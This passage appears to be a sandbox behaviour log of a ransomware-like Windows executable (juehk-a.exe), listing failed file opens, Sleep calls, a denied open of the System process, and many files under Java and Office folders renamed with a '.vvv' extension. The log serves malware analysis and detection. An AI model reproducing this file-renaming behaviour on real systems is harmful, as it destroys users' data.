- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92420
- mode: failed
- sequenceNumber: 2028
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92424
- mode: failed
- sequenceNumber: 2029
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92428
- mode: failed
- sequenceNumber: 2030
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92433
- mode: failed
- sequenceNumber: 2031
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92437
- mode: failed
- sequenceNumber: 2032
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92443
- mode: failed
- sequenceNumber: 2033
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92449
- mode: failed
- sequenceNumber: 2034
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92455
- mode: failed
- sequenceNumber: 2035
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92462
- mode: failed
- sequenceNumber: 2036
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92469
- mode: failed
- sequenceNumber: 2037
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92476
- mode: failed
- sequenceNumber: 2038
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92482
- mode: failed
- sequenceNumber: 2039
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92489
- mode: failed
- sequenceNumber: 2040
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92496
- mode: failed
- sequenceNumber: 2041
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92503
- mode: failed
- sequenceNumber: 2042
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92509
- mode: failed
- sequenceNumber: 2043
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92515
- mode: failed
- sequenceNumber: 2044
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92522
- mode: failed
- sequenceNumber: 2045
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_buttongraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92529
- mode: failed
- sequenceNumber: 2046
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92535
- mode: failed
- sequenceNumber: 2047
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92542
- mode: failed
- sequenceNumber: 2048
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92548
- mode: failed
- sequenceNumber: 2049
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\203x8subpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92554
- mode: failed
- sequenceNumber: 2050
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92561
- mode: failed
- sequenceNumber: 2051
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92568
- mode: failed
- sequenceNumber: 2052
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92574
- mode: failed
- sequenceNumber: 2053
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92580
- mode: failed
- sequenceNumber: 2054
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92587
- mode: failed
- sequenceNumber: 2055
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92594
- mode: failed
- sequenceNumber: 2056
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92615
- mode: failed
- sequenceNumber: 2057
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92622
- mode: failed
- sequenceNumber: 2058
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92628
- mode: failed
- sequenceNumber: 2059
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92635
- mode: failed
- sequenceNumber: 2060
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92641
- mode: failed
- sequenceNumber: 2061
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92648
- mode: failed
- sequenceNumber: 2062
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92655
- mode: failed
- sequenceNumber: 2063
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92662
- mode: failed
- sequenceNumber: 2064
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92669
- mode: failed
- sequenceNumber: 2065
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\scenesscroll.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92675
- mode: failed
- sequenceNumber: 2066
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92682
- mode: failed
- sequenceNumber: 2067
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- apicall:
- timestamp: 92899
- repeat: 9000
- sequenceNumber: 2068
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 92909
- mode: rename
- sequenceNumber: 2069
- filesize: 18862
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_0\lib\deploy\ffjcext.zip
- new_name: C:\Program Files\Java\jre1.7.0_0\lib\deploy\ffjcext.zip.vvv
- ads:
- fid (ads:): 562949953510831
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93022
- mode: rename
- sequenceNumber: 2070
- filesize: 4654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_0\lib\jvm.hprof.txt
- new_name: C:\Program Files\Java\jre1.7.0_0\lib\jvm.hprof.txt.vvv
- ads:
- fid (ads:): 562949953510879
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93126
- mode: rename
- sequenceNumber: 2071
- filesize: 9134
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_0\lib\servicetag\jdk_header.png
- new_name: C:\Program Files\Java\jre1.7.0_0\lib\servicetag\jdk_header.png.vvv
- ads:
- fid (ads:): 562949953510904
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93642
- mode: rename
- sequenceNumber: 2072
- filesize: 14686
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_0\README.txt
- new_name: C:\Program Files\Java\jre1.7.0_0\README.txt.vvv
- ads:
- fid (ads:): 844424930221394
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93698
- mode: rename
- sequenceNumber: 2073
- filesize: 175950
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_0\THIRDPARTYLICENSEREADME.txt
- new_name: C:\Program Files\Java\jre1.7.0_0\THIRDPARTYLICENSEREADME.txt.vvv
- ads:
- fid (ads:): 562949953510739
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93784
- mode: rename
- sequenceNumber: 2074
- filesize: 19038
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_60\lib\deploy\ffjcext.zip
- new_name: C:\Program Files\Java\jre1.7.0_60\lib\deploy\ffjcext.zip.vvv
- ads:
- fid (ads:): 562949953510182
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94023
- mode: rename
- sequenceNumber: 2075
- filesize: 4654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_60\lib\jvm.hprof.txt
- new_name: C:\Program Files\Java\jre1.7.0_60\lib\jvm.hprof.txt.vvv
- ads:
- fid (ads:): 844424930220896
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94361
- mode: rename
- sequenceNumber: 2076
- filesize: 462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_60\README.txt
- new_name: C:\Program Files\Java\jre1.7.0_60\README.txt.vvv
- ads:
- fid (ads:): 562949953510068
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94393
- mode: rename
- sequenceNumber: 2077
- filesize: 125534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME-JAVAFX.txt
- new_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME-JAVAFX.txt.vvv
- ads:
- fid (ads:): 562949953510070
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94434
- mode: rename
- sequenceNumber: 2078
- filesize: 177406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME.txt
- new_name: C:\Program Files\Java\jre1.7.0_60\THIRDPARTYLICENSEREADME.txt.vvv
- ads:
- fid (ads:): 562949953510071
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 94531
- repeat: 10000
- sequenceNumber: 2079
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- process:
- timestamp: 94592
- mode: opened
- sequenceNumber: 2080
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 94630
- mode: rename
- sequenceNumber: 2081
- filesize: 14478
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.8.0_0\lib\deploy\ffjcext.zip
- new_name: C:\Program Files\Java\jre1.8.0_0\lib\deploy\ffjcext.zip.vvv
- ads:
- fid (ads:): 562949953511504
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94700
- mode: rename
- sequenceNumber: 2082
- filesize: 4654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.8.0_0\lib\jvm.hprof.txt
- new_name: C:\Program Files\Java\jre1.8.0_0\lib\jvm.hprof.txt.vvv
- ads:
- fid (ads:): 562949953511566
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94713
- mode: rename
- sequenceNumber: 2083
- filesize: 462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.8.0_0\README.txt
- new_name: C:\Program Files\Java\jre1.8.0_0\README.txt.vvv
- ads:
- fid (ads:): 562949953511390
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94742
- mode: rename
- sequenceNumber: 2084
- filesize: 123742
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME-JAVAFX.txt
- new_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME-JAVAFX.txt.vvv
- ads:
- fid (ads:): 562949953511391
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 94792
- mode: rename
- sequenceNumber: 2085
- filesize: 178862
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME.txt
- new_name: C:\Program Files\Java\jre1.8.0_0\THIRDPARTYLICENSEREADME.txt.vvv
- ads:
- fid (ads:): 562949953511392
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95063
- mode: rename
- sequenceNumber: 2086
- filesize: 25182
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG.vvv
- ads:
- fid (ads:): 562949953497775
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95074
- mode: rename
- sequenceNumber: 2087
- filesize: 24798
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.vvv
- ads:
- fid (ads:): 562949953497777
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95084
- mode: rename
- sequenceNumber: 2088
- filesize: 18686
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG.vvv
- ads:
- fid (ads:): 562949953497778
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95096
- mode: rename
- sequenceNumber: 2089
- filesize: 22334
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG.vvv
- ads:
- fid (ads:): 562949953497780
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95112
- mode: rename
- sequenceNumber: 2090
- filesize: 12110
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG.vvv
- ads:
- fid (ads:): 562949953497782
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95129
- mode: rename
- sequenceNumber: 2091
- filesize: 7358
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG.vvv
- ads:
- fid (ads:): 562949953497784
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95147
- mode: rename
- sequenceNumber: 2092
- filesize: 9246
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG.vvv
- ads:
- fid (ads:): 562949953497785
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 95158
- mode: rename
